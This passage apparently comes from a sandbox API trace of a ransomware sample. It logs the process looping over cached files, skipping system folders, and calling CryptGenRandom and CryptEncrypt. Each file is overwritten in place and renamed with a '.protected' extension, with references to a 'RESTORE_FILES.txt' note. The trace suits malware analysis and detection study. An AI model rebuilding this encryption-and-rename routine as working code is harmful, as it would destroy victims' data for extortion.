nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.230] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.230] CloseHandle (hObject=0x150) returned 1 [0088.230] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected") returned 128 [0088.230] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21.protected")) returned 1 [0088.231] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Windows") returned -1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files") returned -1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="Program Files (x86)") returned -1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="$Recycle.bin") returned 1 [0088.231] lstrcmpiW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="System Volume Information") returned -1 [0088.231] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.231] StrStrIW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".protected") returned 0x0 [0088.231] 
lstrcmpW (lpString1="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpString2="RESTORE_FILES.txt") returned -1 [0088.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.232] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".txt") returned 0x0 [0088.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.233] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".rar") returned 0x0 [0088.233] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0088.233] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".zip") returned 0x0 [0088.233] 
ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.233] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.233] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0088.234] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.234] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.234] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.234] CloseHandle (hObject=0x150) returned 1 [0088.234] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected") returned 161 [0088.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.protected")) returned 1 [0088.235] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0088.235] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0088.235] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.235] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0088.235] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0088.235] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.235] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.236] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0088.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.236] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0088.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 118 [0088.237] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0088.237] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1fa, lpOverlapped=0x0) returned 1 [0088.237] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe06, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.237] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1fa, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1fa, lpOverlapped=0x0) returned 1 [0088.238] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.238] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: 
lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.238] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.238] CloseHandle (hObject=0x150) returned 1 [0088.238] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 128 [0088.238] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0088.239] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.239] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Windows") returned -1 [0088.239] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files") returned -1 [0088.239] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="Program Files (x86)") returned -1 [0088.240] lstrcmpiW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="$Recycle.bin") returned 1 [0088.240] lstrcmpiW 
(lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="System Volume Information") returned -1 [0088.240] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrIW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".protected") returned 0x0 [0088.240] lstrcmpW (lpString1="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpString2="RESTORE_FILES.txt") returned -1 [0088.240] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.240] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.240] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".txt") returned 0x0 [0088.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".rar") returned 0x0 [0088.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0088.240] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".zip") returned 0x0 [0088.240] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x67c, lpOverlapped=0x0) returned 1 [0088.303] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff984, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.303] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x67c, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x67c, lpOverlapped=0x0) returned 1 [0088.303] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.303] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.304] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.304] CloseHandle (hObject=0x150) returned 1 [0088.304] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected") returned 161 [0088.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.protected")) returned 1 [0088.305] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Windows") returned -1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files") returned -1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="Program Files (x86)") returned -1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="$Recycle.bin") returned 1 [0088.305] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="System Volume Information") returned -1 [0088.305] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.305] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".protected") returned 0x0 [0088.305] lstrcmpW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpString2="RESTORE_FILES.txt") returned -1 [0088.305] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.305] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.307] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".txt") returned 0x0 [0088.307] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.307] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".rar") returned 0x0 [0088.307] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned 151 [0088.307] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", lpSrch=".zip") returned 0x0 [0088.307] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.367] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.367] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.368] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.368] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.368] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.368] CloseHandle (hObject=0x150) returned 1 [0088.368] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected") returned 161 [0088.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.protected")) returned 1 [0088.369] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Windows") returned -1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files") returned -1 [0088.369] 